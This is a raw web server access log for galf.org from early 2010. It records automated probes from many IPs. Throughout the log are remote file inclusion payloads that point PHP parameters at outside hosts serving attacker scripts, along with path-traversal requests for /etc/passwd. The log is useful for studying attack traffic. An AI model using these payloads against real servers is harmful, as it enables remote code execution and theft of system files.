201.45.123.132 - - [31/Jan/2010:23:40:55 -0800] "GET /logs/access_090803.log/index.php?sayfa=http://vlg.mebbery.ru/files/Id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [31/Jan/2010:23:40:55 -0800] "GET /index.php?sayfa=http://vlg.mebbery.ru/files/Id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [31/Jan/2010:23:40:56 -0800] "GET /logs/index.php?sayfa=http://vlg.mebbery.ru/files/Id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
58.150.99.131 - - [31/Jan/2010:23:41:34 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.131 - - [31/Jan/2010:23:41:34 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.131 - - [31/Jan/2010:23:41:35 -0800] "GET /logs/access.log%20%20//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [31/Jan/2010:23:41:48 -0800] "GET /logs/access_091221.log/index0.php?show=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [31/Jan/2010:23:41:59 -0800] "GET /logs/access.log%20%20//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.131 - - [31/Jan/2010:23:41:59 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.131 - - [31/Jan/2010:23:42:02 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [31/Jan/2010:23:42:18 -0800] "GET /logs/access_091221.log/index0.php?show=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.150.147.153 - - [31/Jan/2010:23:42:41 -0800] "GET /gnuboard4//bbs//delete_all.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.150.147.153 - - [31/Jan/2010:23:42:41 -0800] "GET /logs//gnuboard4//bbs//delete_all.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.150.147.153 - - [31/Jan/2010:23:42:41 -0800] "GET /logs/access.log//gnuboard4//bbs//delete_all.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.150.147.153 - - [31/Jan/2010:23:42:48 -0800] "GET /gnuboard4//bbs//delete_all.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.150.147.153 - - [31/Jan/2010:23:42:48 -0800] "GET /logs/access.log//gnuboard4//bbs//delete_all.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.150.147.153 - - [31/Jan/2010:23:42:49 -0800] "GET /logs//gnuboard4//bbs//delete_all.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [31/Jan/2010:23:43:14 -0800] "GET /logs/access_090803.log/index.php?sayfa=http://vlg.mebbery.ru/files/Id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [31/Jan/2010:23:43:15 -0800] "GET /index.php?sayfa=http://vlg.mebbery.ru/files/Id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [31/Jan/2010:23:43:15 -0800] "GET /logs/index.php?sayfa=http://vlg.mebbery.ru/files/Id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.79.246.80 - - [31/Jan/2010:23:43:56 -0800] "GET /logs/access.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.79.246.80 - - [31/Jan/2010:23:44:02 -0800] "GET /logs/access.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [31/Jan/2010:23:44:46 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:23:44:46 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:23:44:46 -0800] "GET /logs/access_090803.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [31/Jan/2010:23:45:27 -0800] "GET /logs/access.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.131 - - [31/Jan/2010:23:45:50 -0800] "GET /logs/access.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
194.110.160.78 - - [31/Jan/2010:23:46:01 -0800] "GET /?visualizar=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:23:46:02 -0800] "GET /?visualizar=./../../../../../../../../etc/passwd HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:23:47:29 -0800] "GET /logs/access_090720.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:23:52:13 -0800] "GET /main.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:23:52:13 -0800] "GET /main.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.113.250.49 - - [31/Jan/2010:23:52:39 -0800] "GET /logs/errors.php?error=http://solid.go.ro/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.113.250.49 - - [31/Jan/2010:23:52:39 -0800] "GET /logs/access.log/errors.php?error=http://solid.go.ro/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.113.250.49 - - [31/Jan/2010:23:52:39 -0800] "GET /errors.php?error=http://solid.go.ro/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [31/Jan/2010:23:53:20 -0800] "GET /errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [31/Jan/2010:23:53:20 -0800] "GET /logs/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [31/Jan/2010:23:53:38 -0800] "GET /errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [31/Jan/2010:23:53:38 -0800] "GET /logs/access.log/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [31/Jan/2010:23:53:38 -0800] "GET /logs/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:23:54:41 -0800] "GET /main.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:23:54:42 -0800] "GET /main.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
77.79.246.80 - - [31/Jan/2010:23:54:54 -0800] "GET /logs/access.log/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [31/Jan/2010:23:55:24 -0800] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [31/Jan/2010:23:55:29 -0800] "GET /administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [31/Jan/2010:23:55:29 -0800] "GET /logs/access_090720.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.40.203.226 - - [31/Jan/2010:23:55:30 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.40.203.226 - - [31/Jan/2010:23:55:30 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.40.203.226 - - [31/Jan/2010:23:55:30 -0800] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.40.203.226 - - [31/Jan/2010:23:56:00 -0800] "GET /logs/access_090803.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [31/Jan/2010:23:58:17 -0800] "GET /logs/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [31/Jan/2010:23:58:17 -0800] "GET /logs/access.log/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [31/Jan/2010:23:58:18 -0800] "GET /errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [31/Jan/2010:23:58:37 -0800] "GET /logs/access.log/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [31/Jan/2010:23:58:37 -0800] "GET /errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [31/Jan/2010:23:58:38 -0800] "GET /logs/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.150.224.102 - - [31/Jan/2010:23:59:05 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.o2-world.co.kr/bgm/file/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.150.224.102 - - [31/Jan/2010:23:59:05 -0800] "GET /?sourcedir=http://www.o2-world.co.kr/bgm/file/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
194.150.224.102 - - [31/Jan/2010:23:59:05 -0800] "GET /logs/?sourcedir=http://www.o2-world.co.kr/bgm/file/pid.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
194.150.224.102 - - [31/Jan/2010:23:59:13 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.o2-world.co.kr/bgm/file/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:23:59:32 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:23:59:32 -0800] "GET /logs/access_090720.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:23:59:32 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.150.224.102 - - [01/Feb/2010:00:01:12 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.o2-world.co.kr/bgm/file/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.150.224.102 - - [01/Feb/2010:00:01:12 -0800] "GET /logs/?sourcedir=http://www.o2-world.co.kr/bgm/file/pid.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
194.150.224.102 - - [01/Feb/2010:00:01:12 -0800] "GET /?sourcedir=http://www.o2-world.co.kr/bgm/file/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
122.221.71.90 - - [01/Feb/2010:00:01:31 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.221.71.90 - - [01/Feb/2010:00:01:31 -0800] "GET /delete_all.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.221.71.90 - - [01/Feb/2010:00:01:31 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.221.71.90 - - [01/Feb/2010:00:01:59 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.221.71.90 - - [01/Feb/2010:00:02:03 -0800] "GET /delete_all.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.221.71.90 - - [01/Feb/2010:00:02:10 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.113.250.49 - - [01/Feb/2010:00:03:02 -0800] "GET /logs/access.log%20%20/errors.php?error=http://solid.go.ro/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:00:03:22 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:00:03:22 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:00:03:22 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:00:03:22 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
194.150.224.102 - - [01/Feb/2010:00:04:26 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.o2-world.co.kr/bgm/file/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:05:04 -0800] "GET /logs/access_090720.log%20%20///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:05:04 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:05:05 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:00:05:16 -0800] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.67.244.57 - - [01/Feb/2010:00:05:16 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.67.244.57 - - [01/Feb/2010:00:05:16 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
188.40.203.226 - - [01/Feb/2010:00:06:02 -0800] "GET /logs/access_090720.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [01/Feb/2010:00:06:08 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:00:06:53 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:00:06:53 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:00:06:53 -0800] "GET /logs/access_090928.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:00:06:53 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:00:06:53 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:00:06:53 -0800] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.67.244.57 - - [01/Feb/2010:00:07:14 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:00:07:14 -0800] "GET /logs/access_091012.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:00:07:14 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [01/Feb/2010:00:07:16 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:07:24 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:07:24 -0800] "GET /logs/access_090720.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:07:24 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [01/Feb/2010:00:08:04 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:08:24 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:08:25 -0800] "GET /logs/access_090720.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:08:25 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:08:25 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:08:25 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:08:25 -0800] "GET /logs/access_090720.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [01/Feb/2010:00:08:34 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:08:38 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:08:38 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:08:38 -0800] "GET /logs/access_090615.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:08:40 -0800] "GET /logs/access_090615.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:08:40 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:08:40 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:08:41 -0800] "GET /logs/access_090615.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:08:41 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:08:41 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:09:28 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:09:28 -0800] "GET /logs/access_090615.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:09:29 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:00:10:37 -0800] "GET /logs//gnuboard4/bbs/write_update.php?board_skin_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:00:10:37 -0800] "GET /gnuboard4/bbs/write_update.php?board_skin_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:00:10:37 -0800] "GET /logs//gnuboard4/bbs/write_update.php?board_skin_path=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:00:10:37 -0800] "GET /gnuboard4/bbs/write_update.php?board_skin_path=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:00:11:10 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:00:12:06 -0800] "GET /logs/access_090803.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
